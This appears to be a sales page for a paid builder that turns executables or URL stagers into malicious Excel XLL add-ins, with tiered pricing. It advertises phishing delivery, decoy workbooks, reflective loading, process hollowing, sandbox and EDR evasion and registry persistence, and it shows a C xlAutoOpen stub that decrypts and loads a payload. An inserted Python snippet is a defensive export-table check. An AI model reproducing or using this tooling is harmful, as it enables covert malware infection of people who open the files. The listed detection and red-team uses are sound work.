An XLL is a native DLL that exposes a documented Excel C API. It is, structurally, a Windows PE file with the extension renamed to .xll. When opened, Excel maps it into its own address space and invokes a fixed set of exported entrypoints — the most important being xlAutoOpen, which is called before any user interaction.
This means an XLL has the same trust posture as a regular DLL loaded by Excel: full access to the Excel process token, network, filesystem, registry, and any Windows API. There is no scripting sandbox, no macro warning bar in many configurations, and no Protected View when the XLL is delivered through methods other than direct download.
No VBA, no JScript, no scripting host required

EXCEL.EXE — a Microsoft-signed, fully-trusted process

xlAutoOpen fires › payload runs

From source executable to deliverable XLL in seconds. Pick your binary, choose options, generate.
Drop in a local PE file (.exe) or supply a remote URL the XLL should fetch on activation.
Pick architecture (x86/x64), execution method, persistence flags, and decoy behavior.
Builder produces a native PE with xlAutoOpen entrypoint, embedded payload (or stager), and obfuscated strings.
Send the .xll via mail, link, or share. Target opens in Excel › payload runs. No VBA prompt.
A look at how the generated XLL behaves at runtime.
The stub exports xlAutoOpen (and optionally xlAutoClose, xlAutoAdd). Excel calls these by name during add-in load — no user click on a content surface, no enable-button required.
Choose between (a) embedded — payload bytes encrypted in the XLL's resource section and decrypted in-memory, or (b) stager — XLL fetches the payload from your URL over TLS and runs it.
Reflective load, CreateProcess with hollow target, manual mapping, or thread-pool callback. Several primitives are selectable per build.
Optional decoy: open a benign workbook from embedded data so the user sees a real spreadsheet while execution happens silently in the background.
String stack-encryption, indirect API resolution via PEB walking + hashing (no plain GetProcAddress), control-flow flattening on critical functions.
Builder produces both x86 and x64 outputs. Excel bitness must match the XLL bitness — choose accordingly or build both.
```c
// Excel resolves and calls xlAutoOpen on add-in load.
// No content macros. No VBA prompt. Native code path.
__declspec(dllexport) int WINAPI xlAutoOpen(void)
{
    if (Sandbox_Detected()) return 1;                // quiet exit
    unsigned char *blob = Decrypt_Resource("PAY");   // AES + per-build key
    Reflective_Load(blob, blob_size);                // or stager fetch
    Show_Decoy_Workbook();                           // optional UX
    return 1;
}
```
| Specification | Value |
|---|---|
| Output Format | Native Windows PE (DLL) with .xll extension |
| Architectures | x86 and x64 — match target Excel bitness |
| Office Compatibility | Excel 2010 / 2013 / 2016 / 2019 / 2021 / Microsoft 365 |
| Entrypoint | xlAutoOpen (mandatory), xlAutoClose, xlAutoAdd (optional) |
| Delivery Mode | URL stager (HTTPS fetch on open) · Local embed (encrypted resource section, in-memory load) |
| Execution Primitives | Reflective loader · Process hollow · Manual map · Thread-pool callback |
| Obfuscation | String encryption · API hashing · Control-flow flattening · Per-build polymorphism |
| Decoy Support | Embedded benign .xlsx opened post-execution |
| Anti-Analysis | Sandbox checks, debugger detection, sleep skewing, time-based gating |
| Persistence (optional) | Registry OPEN key under Excel\Options, scheduled task, startup XLL drop |
Authorized engagements where Excel-side delivery is desirable.
Targets running mature EDR but lax Office policy. XLL bypasses VBA-focused detections that don't inspect native add-in loads.
Generate samples to validate Sigma/YARA rules covering xlAutoOpen exports, suspicious DLL loads under EXCEL.EXE, and Office add-in registry artifacts.
Authorized phishing simulations where the lure is a financial spreadsheet — measure click-through and Excel-trust behaviors.
Reproducible XLL test corpora for sandbox tuning, EDR telemetry validation, and DFIR triage practice.
Build challenges around Office trust boundaries, native add-in loaders, and reflective DLL injection.
Replay APT TTPs that historically used XLL delivery (FIN7, TA505, OilRig variants) to test full kill-chain coverage.
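For the detection use case above (rules covering xlAutoOpen exports), here is a static triage check, added as an example and not code from the original page or the builder: it parses a PE export table and reports which of the XLL entrypoints named on this page a file exports. The names `export_names`, `xll_entrypoints` and `constructed_sample` are hypothetical, and the sample bytes are constructed headers with an export name table and no code.

```python
import struct

XLL_EXPORTS = {"xlAutoOpen", "xlAutoClose", "xlAutoAdd"}  # entrypoints named on this page

def export_names(data):
    """Names in a PE export table; raises ValueError/struct.error if malformed."""
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[:2] != b"MZ" or data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec, opt_size, _flags, magic = struct.unpack_from("<H12xHHH", data, pe + 6)
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic")
    # Data directory 0 (exports) is at +96 in PE32 and +112 in PE32+.
    exp_rva = struct.unpack_from("<I", data, pe + 24 + (96 if magic == 0x10B else 112))[0]
    secs = [struct.unpack_from("<8x4I", data, pe + 24 + opt_size + 40 * i) for i in range(nsec)]
    def off(rva):  # RVA -> file offset
        for vsize, va, rsize, raw in secs:
            if va <= rva < va + max(vsize, rsize):
                return rva - va + raw
        raise ValueError("RVA outside every section")
    if exp_rva == 0:
        return []
    count, names_rva = struct.unpack_from("<I4xI", data, off(exp_rva) + 24)
    names = []
    for i in range(min(count, 4096)):  # cap guards against hostile counts
        p = off(struct.unpack_from("<I", data, off(names_rva) + 4 * i)[0])
        names.append(data[p:data.index(b"\0", p)].decode("ascii", "replace"))
    return names

def xll_entrypoints(data):
    """Sorted XLL entrypoint names the image exports; [] for non-PE input."""
    try:
        return sorted(XLL_EXPORTS.intersection(export_names(data)))
    except (ValueError, struct.error):
        return []

def constructed_sample(names=("xlAutoClose", "xlAutoOpen")):
    """Constructed, non-loadable PE32+ bytes: headers and an export name table only."""
    buf = bytearray(0x400)
    struct.pack_into("<2s58xI4sHH12xHHH", buf, 0, b"MZ", 0x40, b"PE\0\0", 0x8664, 1, 0x78, 0x2022, 0x20B)
    struct.pack_into("<III", buf, 0x58 + 108, 1, 0x1000, 0x100)       # one directory: exports
    struct.pack_into("<8s4I", buf, 0xD0, b".rdata", 0x200, 0x1000, 0x200, 0x200)
    struct.pack_into("<I4xI", buf, 0x200 + 24, len(names), 0x1028)    # export directory
    rva = 0x1028 + 4 * len(names)
    for i, n in enumerate(names):                                     # file offset = RVA - 0xE00
        struct.pack_into("<I", buf, 0x228 + 4 * i, rva)
        buf[rva - 0xE00:rva - 0xE00 + len(n)] = n.encode()
        rva += len(n) + 1
    return bytes(buf)
```

A non-empty result for a file arriving by mail or download is a signal to quarantine and inspect, whatever extension the file carries.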
No vbaProject.bin to inspect.

No DPB hex to crack, no Dir-stream artifacts. Build artifacts are pure compiled PE.

Note. Some hardened Office configurations block .xll add-ins by group policy or via the Office Trust Center. Always validate your delivery vector against the target's policy before relying on XLL exclusively.
All tiers include unlimited builds, every execution primitive, all obfuscation layers, and updates within the term.
Bundle option. Need multiple builders? The All Modules Bundle covers every builder + both launchers at a steep discount.
Pick a tier above or talk to us — we'll match the right configuration to your engagement.